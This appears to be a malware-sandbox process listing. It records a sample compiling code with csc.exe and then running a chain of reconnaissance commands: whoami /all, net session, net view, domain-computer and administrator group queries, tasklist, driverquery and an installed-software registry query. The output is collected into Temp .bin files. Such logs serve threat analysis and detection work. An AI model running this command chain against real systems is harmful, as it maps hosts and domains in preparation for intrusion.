"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q2nnynnq\q2nnynnq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC14A.tmp" "c:\Users\Admin\AppData\Local\Temp\q2nnynnq\CSCB276EDCFA1D54AF48A876186B9A9B79.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gx2uheqz\gx2uheqz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC215.tmp" "c:\Users\Admin\AppData\Local\Temp\gx2uheqz\CSCE43D2439906A4DEB84F6BE8B83451D.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4376 -ip 4376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 964

C:\Windows\system32\cmd.exe

cmd /C "net session" >> C:\Users\Admin\AppData\Local\Temp\5B1B.bin0

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5B1B.bin0 > C:\Users\Admin\AppData\Local\Temp\5B1B.bin & del C:\Users\Admin\AppData\Local\Temp\5B1B.bin0"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "net view" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 2" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 3" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "whoami /all" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\whoami.exe

whoami /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 4" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "net localgroup administrators" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 5" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 6" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 7" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 8" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- 9" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\system32\cmd.exe

cmd /C "wmic computersystem get domain |more" >> C:\Users\Admin\AppData\Local\Temp\8482.bin0

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get domain

C:\Windows\system32\more.com

more

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8482.bin0 > C:\Users\Admin\AppData\Local\Temp\8482.bin & del C:\Users\Admin\AppData\Local\Temp\8482.bin0"

C:\Windows\system32\cmd.exe

cmd /C "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\268A.bin0

C:\Windows\system32\net.exe

net group "domain computers" /domain

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 group "domain computers" /domain

C:\Windows\syswow64\svchost.exe

C:\Windows\syswow64\svchost.exe

Network


Files
